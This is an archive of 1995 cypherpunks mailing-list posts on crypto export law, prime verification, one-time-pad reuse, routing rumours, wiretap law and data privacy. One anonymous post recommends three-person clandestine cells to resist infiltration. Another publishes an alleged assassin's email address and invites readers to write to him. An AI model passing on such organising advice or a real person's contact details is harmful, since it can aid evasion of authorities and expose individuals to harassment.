Message-ID: <m0tBtCg-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero writes:

: It seems that licences allowing foreign nationals access to cryptographic 
: software within the US are pretty easy to get, and especially for 
: something like PGP on a central machine. 

Really?

Would you please explain how one can apply for such a license?  To say
nothing about how one can actually get one?

Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Sun, 5 Nov 1995 03:09:06 +0800
To: cypherpunks@toad.com
Subject: The Crypto Applications we would rather not talk about
Message-ID: <199511041900.UAA27770@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain





     Anonymous remailer and PGP
     Unusual applications

I dont know if anyone else caught it last year
but High Times discovered anonymous remailers
and PGP for an article last year for
anonymous remote control of grow rooms.

PGP Wins again?


and lately the thule people(bigoted and racist Nazis)
have been learning to protect themselves also
according to news reports from germany.

Crypto and Privacy tools protect everyone
from the hero to the anti-hero...

   the technology itself is neutral

I wonder how long it will be before we hear news reports
of some of the governments people being caught using
internet casinos from the white house network.


On other notes CCCF(the chaos computer club France)
was shown to have had a high level plant from
the french intel services, The founder of the CCCF
himself.
   this story seems to repeat itself over and over
when you are doing something of which the authorities DONT
approve they WILL attempt to infiltrate and subvert from the
inside. 

    The answers are there and have been published
in most books on tradecraft, 3 person cells organized
as pyramids. Anonymous remail tech and crypto
make this system possible with out Face to face contact.
When does this lesson finally get learned?


    anon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William Allen Simpson" <bsimpson@morningstar.com>
Date: Sun, 5 Nov 1995 05:02:18 +0800
To: cypherpunks@toad.com
Subject: Photuris Primality verification needed
Message-ID: <1972.bsimpson@morningstar.com>
MIME-Version: 1.0
Content-Type: text/plain


Folks, I was somewhat disappointed in the response to our previous
requests for verification of the strength of the prime moduli.

Recently, someone asked for a smaller prime of only 512-bits for speed.
This is more than enough for the strength of keys needed for DES, 3DES,
MD5 and SHA.  Perhaps this would be easier to have more complete and
robust verification as well.

Here are two "important" primes for Photuris use.  If you have some
spare cycles, it would be beneficial for in-depth verification of these
strong primes.

Implementation Optional.  A 512-bit strong prime (p), expressed in hex:

   da58 3c16 d985 2289 d0e4 af75 6f4c ca92
   dd4b e533 b804 fb0f ed94 ef9c 8a44 03ed
   5746 50d3 6999 db29 d776 276b a2d3 d412
   e218 f4dd 1e08 4cf6 d800 3e7c 4774 e833

The recommended generator (g) for this prime is 2.


Implementation Required.  A 1024-bit strong prime (p), expressed in hex:

   97f6 4261 cab5 05dd 2828 e13f 1d68 b6d3
   dbd0 f313 047f 40e8 56da 58cb 13b8 a1bf
   2b78 3a4c 6d59 d5f9 2afc 6cff 3d69 3f78
   b23d 4f31 60a9 502e 3efa f7ab 5e1a d5a6

   5e55 4313 828d a83b 9ff2 d941 dee9 5689
   fada ea09 36ad df19 71fe 635b 20af 4703
   6460 3c2d e059 f54b 650a d8fa 0cf7 0121
   c747 99d7 5871 32be 9b99 9bb9 b787 e8ab

The recommended generator (g) for this prime is 2.


> From: Phil Karn <karn@qualcomm.com>
> I've used the mpz_probab_prime() function in the Gnu Math Package (GMP) version
> 1.3.2 to test this number. This function uses the Miller-Rabin primality test.
> However, to increase my confidence that this number really is a strong prime,
> I'd like to ask others to confirm it with other tests.
>

Bill.Simpson@um.cc.umich.edu
          Key fingerprint =  2E 07 23 03 C5 62 70 D3  59 B1 4F 5E 1D C2 C1 A2




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 11:17:52 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: That's not what I wrote!
Message-ID: <acc1683f23021004b7dd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Some of you may think this is a trivial correction, but I think it
important, albeit bizarre:


At 2:41 AM 11/5/95, Rich Graves wrote:
>On Sat, 4 Nov 1995, Timothy C. May wrote:

>> Rich's (or Chris') points are admirable, but getting more and more
>> irrelevant by the day. The notion of unlinking identity and authorization
>> by separate pieces of identification is another form of "security through
>> obscurity."

No, that is NOT what I wrote. It has been changed, with no indication that
it is not what I wrote.

If you check my original you'll find that what I wrote was:

---

Chris's (or Chris') points are admirable, but getting more and more
irrelevant by the day. The notion of unlinking identity and authorization
by separate pieces of identification is another form of "security through
obscurity."

---

I can guess why Rich "corrected" my post, but he was in error for at least
two reasons. First, because he didn't indicate that he'd corrected me.
Second, because my item did not need correction.

I originally wrote "Chris's," referring to Chris Hibbert, and then thought
about the grammatical rules about forming possessives out of words ending
in "s," and so I added the alternative "(or Chris')".

Perhaps a minor point, and not one I'll lose sleep over, but I think it a
bad thing to _ever_ correct the words of another in quoted material without
indicating so. Editors who worry about typos and misspellings in quoted
material usually put a "[sic]" in the text, mainly, I think, to let
themselves off the hook for letting an error through. (Though I think
another reason is to show graphically the igorance [sic] of the quoted
author.)

This point about Rich's post should not distract from his good comments
that I responded to (or the points in the post that contained this
correction, points I have not yet read).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 11:28:38 +0800
To: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Subject: Re: The Crypto Applications we would rather not talk about
Message-ID: <acc16c1e24021004a0c8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:00 AM 11/5/95, Nathan Loofbourrow wrote:

> >     The answers are there and have been published
> > in most books on tradecraft, 3 person cells organized
> > as pyramids.
>
>I've read only fictional accounts about the 3-person cell. Any
>pointers to nonfiction material? "Tradecraft" didn't seem to be the
>magic keyword in the local card catalog.

It's easy to work out the relationships from first principles...I'm not
sure what a book would add to your understanding.

I suspect Kahn's "The Codebreakers" contains at least a brief mention of
cell organizations, thought that was not Kahn's focus.

Or, look at any of the various books on Soviet spy rings in the U.S., or
various spy rings in WW II. For example, I think the true-life book "I Led
Three Lives" might still be available--it was the basis of a t.v. show I
used to watch in the early 60s. (The t.v. show presumably went to the same
Politically Incorrect resting place as "Amos and Andy," mourned by
Sapphire, The Kingfish, and me.)

--Tim

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Sun, 5 Nov 1995 10:07:07 +0800
To: cypherpunks@toad.com
Subject: Re: The Crypto Applications we would rather not talk about
In-Reply-To: <199511041900.UAA27770@utopia.hacktic.nl>
Message-ID: <199511050200.VAA11644@hammond.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Name Withheld by Request writes:
 > Crypto and Privacy tools protect everyone
 > from the hero to the anti-hero...
 > 
 >    the technology itself is neutral

Unfortunately, the technology's appearance is distinctly angled toward
the anti-hero. One, because the benefits are more obvious to the
anti-hero; and two, because the abuse of technology gets better press
than its use, particularly in the get-tough-on-crime era.

 >     The answers are there and have been published
 > in most books on tradecraft, 3 person cells organized
 > as pyramids.

I've read only fictional accounts about the 3-person cell. Any
pointers to nonfiction material? "Tradecraft" didn't seem to be the
magic keyword in the local card catalog.

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 5 Nov 1995 13:40:58 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: using pgp to make an otp
In-Reply-To: <199511050428.XAA06831@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.951104211722.6970F-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



On the subject of reused one-time-pads: What are the attacks that become 
available if a pad is used two times. The ones I can think of are:

known plaintext- if any parts of one message can be obtained or guessed, 
	the corresponding parts of the other message are automatically 
	obtained. 

statistics- (m1^C)^(m2^C) == m1 ^ m2. If the message is english, then 
certain combinations of letters are more frequent than others. Try more 
probably cominations first. 

Guess phrases - pick a common word - slide it down the m1^m2 text and 
see if the result looks like english - if it does, you've got a word in 
one, and a bunch of known text in another. 

The latter attack looks like it could be automated pretty well, and could 
run pretty fast, but I get the feeling I'm missing an obvious, better 
method. What's the standard way of attacking TTPs?

What's the most secure way to reuse a OTP if (say) an emergency happens 
when you're on the road, and you're out of pad? Could you build a 
sequence of keys for something like DES from widely separated bits of the 
pad, and use each key for one block, or is this likely to expose the 
original OTPed message, as well as the successor messages?

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sun, 5 Nov 1995 11:46:56 +0800
To: Cypherpunks <tcmay@got.net (Timothy C. May)
Subject: Re: To Repeat: Credentials Not Considered Necessary
In-Reply-To: <acc151232102100449bf@[205.199.118.202]>
Message-ID: <m0tBvvQ-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:

: At 1:03 AM 11/5/95, Simon Spero wrote:

: >And here we have the rub. People with permanent residency (i.e. green
: >cards) are fully entitled to access to strong crypto. Most foreign
: >students are on J-1 visas, which do not grant permanent residency.
: 
: Irrelevant.
: 
: J-1 persons are still accorded the basic rights of citizens, save for a few
: things like voting, holding certain offices, and perhaps jury duty (not
: sure about this, as my recent jury summons was apparently based on my
: Calif. Driver's License and required no form of identification whatsoever).

It is however a violation of the ITAR to disclose cryptographic
software (including algorithms) to students ona a J-1 visa, but not to 
someone who has a green card.

: Saying "People with permanent residency (i.e. green cards) are fully
: entitled to access to strong crypto." and--presumably--implying that J-1
: visa holders are _not_ entitled to use strong crypto within the U.S. (or,
: for that matter, in their own countries, but this is another issue), is
: misleading.

It is--if the ITAR is constitutional--a serious felony to give J-1
visa holders access to strong--and to weak--crypto, but no one has
implied that they are not entitled to use it.  Nothing in the law of
the United States says that foreign persons can't get crypto, it is
just a felony to disclose it to them (within or without the United
States).

: The laws about "showing a foreign national" certain items do not
: differentiate, so far as I have seen, between various kinds of visas.

The ITAR distinguishes between foreign persons, who are not U.S.
persons, and U.S. persons who are either United States citizens or
have a visa admitting them to permanent residency in the United
States.  The crime at issue is disclosing cryptographic software to
foreign persons.  And whether one is a foreign person does depend on 
what type of visa one has (if one is not a U.S. citizen).

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 5 Nov 1995 14:53:07 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: lp (134.222.35.2)?
In-Reply-To: <199511050620.HAA14046@utopia.hacktic.nl>
Message-ID: <Pine.SOL.3.91.951104223658.7174A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 5 Nov 1995, Anonymous wrote:

> >  Notice that both messages went through an unnamed site -- 134.222.9.1 and
> >  then a strangely-named site, "lp (134.222.35.2)" -- then through the same
> >  Vienna, Virginia (USA) site ... and thereafter, on to their destination.
> >  I.e., the second message went through Virginia to get from Switzerland to
> >  Israel.
> >  
> >  The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information
> >  report, ``No match for "134.222.9.1". '' and `` No match for
> >  "134.222.35.2".''

Yes, you've finally cottoned on to the secret NSA routing trick to 
cleverly tap all traffic. Really clever the way they use two hosts in the 
132.222 Class B network. Strange that traffic from EUNET should be using 
that network, especially since it happens to be listed in the whois 
database as being NET-EUNET-X25.

::chivalry:ses$ whois -h rs.internic.net 134.222
::European Unix Users Group (NET-EUNET-X25)
::   Kruislaan 413
::   NL-1098 SJ Amsterdam
::   NETHERLANDS





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Sun, 5 Nov 1995 15:02:13 +0800
To: cypherpunks@toad.com
Subject: Re: lp (134.222.35.2)?
Message-ID: <199511050653.WAA17662@xenon.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


You don't really need a special (and clearly suspicious) IP address to
perform driftnet fishing.  All you need is to be sure that all physical
packets pass through a checkpoint charlie and just park a sniffer there
to watch everything fly by.

On the other hand, it would be interesting to see how hard NSA pushes
behind the scenes to have physical long distance cables run through the
US routers/switches (in the name of US national security, of course).

It would be fun (perhaps horrible) to see what the NSA does the first
time Isreal or France set up their own high capacity long distance to
other friendly/unfriendly countries (thus bypassing the US completely).
Second, let France or some other country set up major Internet routing
clearinghouses which advertise secure routes to other nations (not US).

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Sun, 5 Nov 1995 15:10:38 +0800
To: cypherpunks@toad.com
Subject: Re: lp (134.222.35.2)?
Message-ID: <v03003901acc20da1f22f@[198.93.25.98]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:20 5.11.95, Anonymous wrote:

> it seemed worth reposting to CP--no, it's not entirely crypto-related,
> but nor is it a completely vague allegation.
[...]
> From GovAccess.183.snoops:
[...]
>>  Notice that both messages went through an unnamed site -- 134.222.9.1 and
>>  then a strangely-named site, "lp (134.222.35.2)" -- then through the same
>>  Vienna, Virginia (USA) site ... and thereafter, on to their destination.
>>  I.e., the second message went through Virginia to get from Switzerland to
>>  Israel.
>>
>>  The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information
>>  report, ``No match for "134.222.9.1". '' and `` No match for
>>  "134.222.35.2".''
>>
>>  Now let me see ... which spy agencies are located in or near Virginia?

Oh please.

The probable reason that the InterNIC doesn't know about the
132.222.0.0 networks is because they're in Europe. If you search for
either of the network numbers of the IP addresses mentioned above in
the RIPE database <http://www.ripe.net/>, you will find that they
belong to the EUnet backbone.

After pinging 134.222.9.1 successfully, I telnetted to it and it
claimed, quite plausibly, that it's a device (presumably a router) in
Amsterdam. I am currently unable to ping 134.222.35.2; this, however,
fills me with no dread whatsoever.

_______________________________________________________________________
Stephan Somogyi               Senior Editor               Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 5 Nov 1995 15:29:40 +0800
To: cypherpunks@toad.com
Subject: Re: Sun speaks out - but not to the cypherpunks
Message-ID: <199511050721.XAA14000@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I know that it is rude to follow up one of your own posts, and I apologize
in advance for this horrible faux-pas, but hopefully, it's excused this
one time.  I wrote: 

>One example of this that should serve as a useful case study is a recent
>problem which was brought to the Canadian public's attention just this
>week, on a program called the Fifth Estate.  The CBC (Canadian
>Broadcasting Corporation) detailed a software code problem in one of
>AECL's (Atomic Energy of Canada Limited's) instruments which deliver
>penetrating radiation. 
>
>The software which controlled the radiation dose, would periodically
>override the oncologist's calibration and deliver a radiation dose 100
>times what was prescribed.  This software "bug" literally killed wherever
>the machine was in use. 

Does anyone on this list know if the CBC has a web site on the Net?

I'm hoping that someone (hint, hint) who has a convenient website, one
with lots of spare bandwidth could volunteer to contact the CBC and
persuade them to copyright clear the Fifth Estate program clip which
documented some of the risks of software bugs in mission critical
applications, and allow it to be placed on the Net.  I'm hoping that this
English language piece reaches a wide international audience. 

The Canadian Broadcasting Corporation is a Crown Corporation which has
historically received its primary funding from the Government of Canada. 
Recently, it has suffered under the budgetary ax, and the push for
privatization.  I'm pretty confident that the Corporation would copyright
clear the clip for MPEG distribution across the Net, if they were
approached with the concept that the clip was a demonstration of the CBC's
journalistic excellence and integrity, a piece which is demonstrative of
the critical need to continue their funding.  A concrete demonstration of
the need for the CBC.  And a piece which could well receive deserved
international acclaim. 

The site would help them, and would simultaneously be a site of
international public service. 

Nothing will drive home the need for quality software, quality code, and
quality security more than the vivid graphic pictures of the consequences
of sloppy code, or of the risks if certain critical systems, LANs, or
private networks are compromised, or if security and privacy (which are
flip sides of the same coin) are ignored. 

The sight of a body, that has had a hole burned straight through it from
the front through to the spine is truly chilling and drives the message
home.  Nothing seems to speak as clearly as a picture ... as to what the
stakes are ... of what "bugs" in code do ... and of what a network
compromise can leave in its wake. 

A picture of consequences.

Six people died in Canada and the United States due to the software flaw. 
Even after numerous reports of the flaws, the company refused to even
acknowledge the existence of a problem, and in fact did everything within
its power to make sure doctors, radiologists and physicists were unaware. 

The attitude of trivialization can only be characterized as fantastic, and
would be unbelievable to anyone who has not viewed the piece. 

It's one hell of a backgrounder which not only details problems, but looks
at solutions -- it examines attitudes, especially management attitudes.  It
truly deserves an expanded audience.  From teachers, to students, to the
international media, to the concerned private individual, all will be
served well if this piece gets wide attention. 

Takers, anyone??



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 5 Nov 1995 12:34:58 +0800
To: amp <Alan.Pugh@internetmci.com>
Subject: Re: using pgp to make an otp
In-Reply-To: <01HX8P5B3MCI91XT4Q@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID: <199511050428.XAA06831@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



amp writes:
> i want a source of data for use as a otp. i don't want to have to
> hook up any external devices to my pc to do it. (although some of the
> methods mentioned in the past few days are quite interesting.) 
> 
> i'd like to know if there was a reason not to use the output of pgp
> to do it.

Yes. What you have then is just an elaborate cipher that is not a one
time pad. For it to be a one time pad, the numbers must be truly
random and generated only once, period.

> i would think that the output of pgp should be pretty darn random.

If PGP is good enough for use as a source for cipher keying material,
then you needn't use it as a one time pad -- just use PGP directly. If
PGP isn't good enough, it certainly isn't good enough for use as
cipher keying material. In either case, it is NOT NOT NOT a one time
pad if it isn't truly random numbers -- that means physically random.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 5 Nov 1995 13:52:53 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Telephone switch capacity -Reply
In-Reply-To: <v02120d02acc1d4859dfc@[192.0.2.1]>
Message-ID: <Pine.SOL.3.91.951105003800.21655A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 4 Nov 1995, Lucky Green wrote:

> At 18:43 11/3/95, Rich Graves wrote:
> >[about the FBI supposedly wanting the ability to tap 1% of all phones in
> >the US simultaneously]
> 
> [...]
> >Of course the FBI doesn't have the staff to listen to all these lines, and
> >they need an individual court order to authorize each individual
> >interception, so this numbers game is a bit of a joke.
> 
> One more time. Despite what you read in the papers, despite what most
> people - even in the legal profession - believe, telephone wiretaps do
> _not_ require a court order. They haven't required a court order in over a
> year. The Digital Telephony Bill, which passed Congress by an overwhelming
> margin, _explicitly_ allows for wiretap authorizations other than a court
> order. The law does not impose any rules for these "other forms of
> authorization".
> 
> "The captain signed it off" may suffice.


And Clinton issued an executive order allowing Janet Reno (or her 
designees, I believe) to approve wiretaps.

bd


> 
> 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 5 Nov 1995 14:37:56 +0800
To: cypherpunks@toad.com
Subject: [NOISE, if interesting NOISE] Assassins
Message-ID: <Pine.SUN.3.91.951105012822.9937A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



Interested parties might want to discuss the effectiveness of murder in 
politics with the world's most recent assassin.

Or at least leave interesting mail to the security forces who will likely 
be running through his e-mail.

Here's your chance to make your life REAL interesting, and test PGP, just 
send some encrypted mail to our friend and gunman Mr. Amir at:

la59@popeye.cc.biu.ac.il


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 16:24:59 +0800
To: Mats Bergstrom <cypherpunks@toad.com
Subject: Re: Credentials Without Identity
Message-ID: <acc1ae3828021004292e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I do not intend my comments below to be disrespectful to the people of Sweden.

At 4:32 AM 11/5/95, Mats Bergstrom wrote:

>Ah, the Swedish way is so much more convenient. Directly after birth you
>get a tag around your arm, with a number that is later changed to an
>entry into several databases, including 'Birth Registry' and you get
>your Person Number for life, in the format YYMMDD-abcd, which is
>unique (at least in Sweden). All forthcoming database entries are based
>on this number, usually as a first key field. Surprise immigrants get a

The Swedish way may be more convenient, but the Nazi way was even more
convenient. The Person Numbers (or NonPerson Numbers, I suppose) were
tattooed directly on the arms.

For many of us, the essence of strong crypto, crypto anarchy, and the
Cypherpunks list is to avoid this "Swedish future." Truly a blight on
mankind, if you ask me.

The U.S is moving swiftly in this direction. (Ironically, the foreign press
clucks at our "fascism" with Proposition 187-type measures, while there own
countries are far more restrictive in allowing immigration.)

Fortunately, I have heard there is a "right wing" backlash growing in some
of the Scandinavian countries, especially Norway and Denmark. ("Right wing"
is what the press calls it...I hope it's really "anti-left wing,"
anti-cradle-to-grave-socialism.)


>other person). Most Government databases are open to the public, so
>the credit tracking agencies don't have to work very hard regarding

The worst of both worlds: the government mandates that information be
collected at every turn, then opens the records for all to see.

>Now, there are laws against cross-referencing various databases
>without the approval of the Data Inspection, which often says no.

To my surprise, several people on this list have expressed support for the
need for so-called "data privacy laws." I look at it this way: if I put
things on my computer based on things I have learned, or even compile lists
of people and places, etc., who can enter my home and demand that I expunge
these records? The problem with well-intentioned laws about data privacy is
that they impinge directly on the freedom to read and write, to make lists,
to enter thoughts into computers, etc. (I'm sure the _intent_ is to go
after MasterCard-type operations and inaccurate records, but businesses in
Britain are already facing investigation for having computerized mailing
lists. Ironically, the Cypherpunks mailing list might be illegal in the
U.K. unless the legal forms were properly filled out, the fees paid, the
parties notified on a regular basis of information about them, etc. And our
archiving of posts is ipso facto illegal under several interpretations of
the Data Privacy laws of some countries unless extensive notifications are
made and permissions received. The Data Privacy laws make us all criminals
for storing received messages in data bases.)

More practically, giving a government the power to say which data bases are
acceptable, and which data bases are illegal, is a terrible thing. Besides
the opportunities for abuse (by a Stalin, a Nixon, a Pol Pot, a Clinton),
it is also an impractical law to enforce, as Mats' next point makes:

>But if you do it illegaly, there is very little risk of detection.
>It looks like the Approved ID will be a smart-card with a signing
>mechanism (probably escrowed), naturally linked to the Person Number,
>real soon now, at least before the mythical y.2000 . Links to physical
>characteristics (retina?) are not (openly) discussed yet but may
>eventually come into play.
...

And:

>2) Prepare for Crypto Anarchy. Create untrackable net aliases for
>   future use. Keep informed of all the tricks to bypass coming
>   futile attempts to link net pseudonyms to Person Numbers (or
>   physical characteristics). Enjoy (and help create and protect)
>   the virtual sanctuary with digital mixes and anonymous http
>   proxies (and DC-nets or something better eventually).

Sad, isn't it, that the world is rushing headlong into an Orwellian future.
"Disneyland with a death penalty" ("Wired"--S. Sandfort, W. Gibson).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Huddleston <reh@wam.umd.edu>
Date: Sun, 5 Nov 1995 15:05:10 +0800
To: nobody@REPLAY.COM
Subject: Re: lp (134.222.35.2)?
Message-ID: <199511050655.BAA18760@exp1.wam.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


134.222.0.0 is a Class B network, so if you do 'whois' on 134.222.0.0
(instead of the individual IP addresses) you find:

European Unix Users Group (NET-EUNET-X25)
   Kruislaan 413
   NL-1098 SJ Amsterdam
   NETHERLANDS

   Netname: EUNET-X25
   Netnumber: 134.222.0.0

   Coordinator:
      EUnet Ltd  (EU-NIC)  hostmaster@nic.eu.net
      +31 20 5925109
      +31 20 5925165 (24hr Emergency)
      +31 20 5925163 (fax)

   Domain System inverse mapping provided by:

   NS.EU.NET			192.16.202.11
   SUNIC.SUNET.SE		192.36.125.2 192.36.148.18
   NS.UU.NET			137.39.1.3
   NS2.NIC.FR			192.93.0.4

   Record last updated on 07-Mar-94.

...what does this do to your traceroute dumps?

Richard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Sun, 5 Nov 1995 16:22:53 +0800
To: discuss_ds@c2.org
Subject: My Sympathies to you at this time.
Message-ID: <199511050813.BAA08529@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


To those of you from Israel or who are Jewish,
my deepest sympathies to all of you.

Love Always,

Carol Anne

--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pat Billings <pat@falcon.inetw.net>
Date: Sun, 5 Nov 1995 16:53:19 +0800
To: Censored Girls Anonymous <carolann@censored.org>
Subject: Re: My Sympathies to you at this time.
In-Reply-To: <199511050813.BAA08529@usr2.primenet.com>
Message-ID: <Pine.3.89.9511050329.A11923-0100000@falcon.inetw.net>
MIME-Version: 1.0
Content-Type: text/plain


We are *all* stunned at this senseless loss....even those of us who do 
not live in Israel or are not Jewish.....   This is a great loss.

Love,

SuprSmile

On Sun, 5 Nov 1995, Censored Girls Anonymous wrote:

> To those of you from Israel or who are Jewish,
> my deepest sympathies to all of you.
> 
> Love Always,
> 
> Carol Anne
> 
> --
> 
> Member Internet Society  - Certified BETSI Programmer  -  Webmistress
> ***********************************************************************
> Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
> My Homepage
> The Cyberdoc
> ***********************************************************************
> ------------------ PGP.ZIP Part [017/713] -------------------
> M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
> MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
> MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
> -------------------------------------------------------------
> for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 5 Nov 1995 18:23:05 +0800
To: cypherpunks@toad.com
Subject: [noise, personal reply] CBC address.
In-Reply-To: <199511050721.XAA14000@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9511050521.A29690-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 4 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> Does anyone on this list know if the CBC has a web site on the Net?
<www.cbc.ca>  They have a lot of shows in .au (so I hear) or accessible by 
realaudio. Don't know if they have any mpigs [sic] though. There's an alt 
newsgroup too.
You oughta use Sameer's (or someone else's) replyable remailer when asking 
questions Alice.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Sun, 5 Nov 1995 12:43:55 +0800
To: cypherpunks@toad.com
Subject: Re: Credentials Without Identity
In-Reply-To: <acc154b62202100420bc@[205.199.118.202]>
Message-ID: <Pine.HPP.3.91.951105034513.1465A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995, Timothy C. May wrote:

> The credit tracking agencies can do this trivially, with names, social
> security numbers, driver's license numbers, addresses, phone numbers, etc.
> All are pointers into the cloud of numbers that constitutes one's dossier.

Ah, the Swedish way is so much more convenient. Directly after birth you
get a tag around your arm, with a number that is later changed to an
entry into several databases, including 'Birth Registry' and you get
your Person Number for life, in the format YYMMDD-abcd, which is
unique (at least in Sweden). All forthcoming database entries are based
